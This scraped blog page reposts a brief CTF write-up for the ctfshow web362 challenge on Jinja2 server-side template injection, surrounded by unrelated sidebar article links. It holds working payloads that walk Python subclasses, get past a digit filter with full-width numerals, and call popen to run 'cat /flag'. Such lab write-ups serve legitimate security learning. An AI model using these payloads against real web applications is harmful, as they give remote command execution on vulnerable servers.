当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
?name={
{"".__class__.__bases__[0].__subclasses__()}} It's normal up to this point 
from 12 It didn't work at first 
There's a problem with the numbers , see wp Use full angle numbers instead of normal numbers to bypass
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
Then you should be able to do it in the normal way
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- According to the result set queried by SQL statement, it is encapsulated as JSON
- Matlab tips (6) comparison of seven filtering methods
- Kettle paoding jieniu Chapter 17 text file output
- Spark performance optimization guide
- Serialization scheme of serde - trust
- CISSP certified daily knowledge points (April 14, 2022)
- 【ACM】376. 摆动序列
- With the use of qchart, the final UI interface can be realized. The control of qweight can be added and promoted to a user-defined class. Only the class needs to be promoted to realize the coordinate
- 昇腾 AI 开发者创享日全国巡回首站在西安成功举行
- Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash
猜你喜欢
纠结
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
【ACM】376. Swing sequence
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
Jeecg boot microservice architecture
Excel intercept text
WiFi ap6212 driver transplantation and debugging analysis technical notes
STM32 learning record 0008 - GPIO things 1
深度学习经典网络解析目标检测篇(一):R-CNN
随机推荐
Daily network security certification test questions (April 14, 2022)
Daily CISSP certification common mistakes (April 14, 2022)
回路-通路
软件测试总结
Cutting permission of logrotate file
Serialization scheme of serde - trust
Matlab tips (6) comparison of seven filtering methods
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
Daily CISSP certification common mistakes (April 13, 2022)
7-21 wrong questions involve knowledge points.
【数学建模】—— 层次分析法(AHP)
Install the yapiupload plug-in in idea and upload the API interface to the Yapi document
Introduction to quantexa CDI syneo platform
Using transmittablethreadlocal to realize parameter cross thread transmission
机器学习实战 -朴素贝叶斯
Rust: how to match a string?
STM32学习记录0008——GPIO那些事1
Resolve the error Max virtual memory areas VM max_ map_ count [65530] is too low, increase to at least [262144]
WiFi ap6212 driver transplantation and debugging analysis technical notes
Daily CISSP certification common mistakes (April 11, 2022)